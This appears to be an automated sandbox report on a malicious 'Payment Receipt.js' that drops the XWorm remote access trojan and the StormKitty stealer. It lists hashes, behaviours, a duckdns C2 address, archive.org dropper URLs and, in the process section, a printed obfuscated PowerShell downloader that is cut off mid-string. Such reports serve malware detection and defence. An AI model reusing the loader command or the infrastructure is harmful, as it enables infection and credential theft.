Analysis
-
max time kernel
96s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
06-08-2024 05:55
General
-
Target
Payment Receipt.js
-
Size
330KB
-
MD5
95be6aa690cfa33cf39ae04df1f71d10
-
SHA1
c6d9a946176a7b216341387b4acfa01cba1da264
-
SHA256
f4e2003ac6fe30a9b388badeed14ec8b9564446738c7c2313e39e476b7a4023a
-
SHA512
8327287a6c0833d4ef5eb1b3f77c4a89a92d8b642353987af9c8c10d9f8a607d24faf2865578d6f8ceaf6f12a2d8e6571d372e41ac839487f9b6381207800e28
-
SSDEEP
6144:9CgH7TPnDL0svfrbvfTDEkvPrLvPTzWmP/rbP/TDkEPvrLPvTzyCvfrbvfTDEkvT:T
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
exe.dropper
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Extracted
Family
xworm
Version
5.0
C2
lisa22194141.duckdns.org:7000
Mutex
xyIsniB5c2bg0ZE4
Attributes
-
install_file
USB.exe
aes.plain
Signatures
-
Detect Xworm Payload 1 IoCs
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 23 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Payment Receipt.js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿YQBn⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿VQBy⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿JwBo⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bw⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿Og⟑ ㏏ ䷆ ⋀ ▿v⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿aQBh⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿M⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿x⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿M⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿dQBz⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿YQBy⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿a⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿HY⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿cgBn⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿MQ⟑ ㏏ ䷆ ⋀ ▿w⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿aQB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bQBz⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bo⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿bwB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿Xw⟑ ㏏ ䷆ ⋀ ▿y⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Mg⟑ ㏏ ䷆ ⋀ ▿0⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Nw⟑ ㏏ ䷆ ⋀ ▿v⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQBh⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿a⟑ ㏏ ䷆ ⋀ ▿Bu⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿agBw⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿dwBl⟑ ㏏ ䷆ ⋀ ▿GI⟑ ㏏ ䷆ ⋀ ▿QwBs⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿ZQBu⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿TgBl⟑ ㏏ ䷆ ⋀ ▿Hc⟑ ㏏ ䷆ ⋀ ▿LQBP⟑ ㏏ ䷆ ⋀ ▿GI⟑ ㏏ ䷆ ⋀ ▿agBl⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿eQBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿TgBl⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿LgBX⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿YgBD⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿aQBl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿aQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿ZwBl⟑ ㏏ ䷆ ⋀ ▿EI⟑ ㏏ ䷆ ⋀ ▿eQB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿cw⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Hc⟑ ㏏ ䷆ ⋀ ▿ZQBi⟑ ㏏ ䷆ ⋀ ▿EM⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bgB0⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿R⟑ ㏏ ䷆ ⋀ ▿Bv⟑ ㏏ ䷆ ⋀ ▿Hc⟑ ㏏ ䷆ ⋀ ▿bgBs⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿YQBk⟑ ㏏ ䷆ ⋀ ▿EQ⟑ ㏏ ䷆ ⋀ ▿YQB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿K⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bQBh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿ZQBV⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿p⟑ ㏏ ䷆ ⋀ ▿Ds⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿YQBn⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿V⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿Bb⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿eQBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿V⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿EU⟑ ㏏ ䷆ ⋀ ▿bgBj⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿ZwBd⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿OgBV⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿Rg⟑ ㏏ ䷆ ⋀ ▿4⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿RwBl⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿UwB0⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿aQBu⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿K⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bQBh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿ZQBC⟑ ㏏ ䷆ ⋀ ▿Hk⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿KQ⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿EY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿8⟑ ㏏ ䷆ ⋀ ▿Dw⟑ ㏏ ䷆ ⋀ ▿QgBB⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿RQ⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿DQ⟑ ㏏ ䷆ ⋀ ▿XwBT⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿QQBS⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿Pg⟑ ㏏ ䷆ ⋀ ▿+⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿Ow⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿EY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿8⟑ ㏏ ䷆ ⋀ ▿Dw⟑ ㏏ ䷆ ⋀ ▿QgBB⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿RQ⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿DQ⟑ ㏏ ䷆ ⋀ ▿XwBF⟑ ㏏ ䷆ ⋀ ▿E4⟑ ㏏ ䷆ ⋀ ▿R⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿+⟑ ㏏ ䷆ ⋀ ▿D4⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿Ek⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bQBh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿ZQBU⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿B0⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿SQBu⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿E8⟑ ㏏ ䷆ ⋀ ▿Zg⟑ ㏏ ䷆ ⋀ ▿o⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿EY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿KQ⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿ZQBu⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿SQBu⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿aQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿ZwBl⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿LgBJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿TwBm⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿BG⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿YQBn⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿Ow⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿BJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿BJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿Ek⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿Ek⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿Cs⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿EY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿LgBM⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bgBn⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿a⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿YgBh⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿DQ⟑ ㏏ ䷆ ⋀ ▿T⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿ZwB0⟑ ㏏ ䷆ ⋀ ▿Gg⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿BJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿YQBy⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿SQBu⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿Ds⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bi⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cwBl⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿BD⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿aQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿ZwBl⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿LgBT⟑ ㏏ ䷆ ⋀ ▿HU⟑ ㏏ ䷆ ⋀ ▿YgBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿cgBp⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Zw⟑ ㏏ ䷆ ⋀ ▿o⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿Ek⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bi⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cwBl⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿BM⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bgBn⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿a⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿p⟑ ㏏ ䷆ ⋀ ▿Ds⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bj⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿EI⟑ ㏏ ䷆ ⋀ ▿eQB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿cw⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿Bb⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿eQBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿QwBv⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿dgBl⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bd⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿OgBG⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿bwBt⟑ ㏏ ䷆ ⋀ ▿EI⟑ ㏏ ䷆ ⋀ ▿YQBz⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿Ng⟑ ㏏ ䷆ ⋀ ▿0⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿By⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bgBn⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ 